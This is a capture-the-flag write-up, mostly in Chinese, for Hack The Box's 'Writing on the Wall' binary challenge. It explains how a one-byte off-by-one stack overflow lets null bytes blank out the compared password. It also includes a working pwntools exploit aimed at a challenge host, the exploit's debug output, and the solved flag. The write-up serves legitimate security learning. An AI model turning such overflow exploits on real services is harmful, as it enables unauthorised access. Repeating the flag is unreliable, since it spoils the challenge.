HTB-Writing on the Wall

CHALLENGE DESCRIPTION

As you approach a password-protected door, a sense of uncertainty envelops you—no clues, no hints. Yet, just as confusion takes hold, your gaze locks onto cryptic markings adorning the nearby wall. Could this be the elusive password, waiting to unveil the door's secrets?

题解

解压压缩包得到

➜  challenge  l
total 20K
drwxrwxrwx 1 fxe00 fxe00 4.0K Jan 29  2024 .
drwxrwxrwx 1 fxe00 fxe00 4.0K Aug 23  2024 ..
-rwxrwxrwx 1 fxe00 fxe00   25 Jan 29  2024 flag.txt
drwxrwxrwx 1 fxe00 fxe00 4.0K Jan 29  2024 glibc
-rwxrwxrwx 1 fxe00 fxe00  17K Jan 29  2024 writing_on_the_wall

➜  challenge  file writing_on_the_wall
writing_on_the_wall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./glibc/ld-linux-x86-64.so.2, BuildID[sha1]=e1865b228b26ed7b4714423d70d822f6f188e63c, for GNU/Linux 3.2.0, not stripped

已知writing_on_the_wall可执行文件为64位动态链接文件, 使用IDA64进行分析
main函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[6]; // [rsp+Ah] [rbp-16h] BYREF
  char s2[8]; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  *(_QWORD *)s2 = 0x2073736170743377LL;
  read(0, buf, 7uLL);
  if ( !strcmp(buf, s2) )
    open_door();
  else
    error("You activated the alarm! Troops are coming your way, RUN!\n");
  return 0;
}

继续看open_door()函数

unsigned __int64 open_door()
{
  char buf; // [rsp+3h] [rbp-Dh] BYREF
  int fd; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  fd = open("./flag.txt", 0);
  if ( fd < 0 )
  {
    perror("\nError opening flag.txt, please contact an Administrator.\n");
    exit(1);
  }
  printf("You managed to open the door! Here is the password for the next one: ");
  while ( read(fd, &buf, 1uLL) > 0 )
    fputc(buf, _bss_start);
  close(fd);
  return v3 - __readfsqword(0x28u);
}

逻辑比较简单, 连接远程地址进行输入, 与s2指向字符串相等则输出flag.但是存在一个问题: 我们输入的字节会存进buf2, buf2占6字节, 但是read(0, buf, 7uLL);读取了7字节, 这里存在了溢出。根据栈结构, buf2在上, s2紧邻buf2在下, 当buf2读取7字节时会向s2覆盖一个byte, 因此将buf2填充为0, 第七个byte也填充为0, 这样s2就成了空字符串, 最终strcmp时两个空字符串比较相等。

Exploit

import pwn

pwn.context.log_level = 'debug'
pwn.context.os = 'linux'
pwn.context.arch = 'amd64' # i386 amd64

io = pwn.remote('94.237.59.199', 33068)
# io = pwn.process('./challenge')
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
payload = pwn.p64(0x00)

io.send(payload)
io.interactive()

shell:

➜  Writing-on-the-Wall  python3 exp.py
[+] Opening connection to 94.237.59.199 on port 33068: Done
[DEBUG] Sent 0x8 bytes:
    b'\x00' * 0x8
[*] Switching to interactive mode
[DEBUG] Received 0xd6 bytes:
    00000000  1b 5b 32 4a  1b 5b 30 3b  30 48 1b 5b  31 3b 33 36  │·[2J│·[0;│0H·[│1;36│
    00000010  6d e3 80 b0  e2 91 a2 20  e2 95 a4 20  e2 84 99 20  │m···│··· │··· │··· │
〰③ ╤ ℙ Å ⅀ ₷

The writing on the wall seems unreadable, can you figure it out?

>> You managed to open the door! Here is the password for the next one: HTB{4n0th3r_br1ck_0n_th3_w4ll}
[*] Got EOF while reading in interactive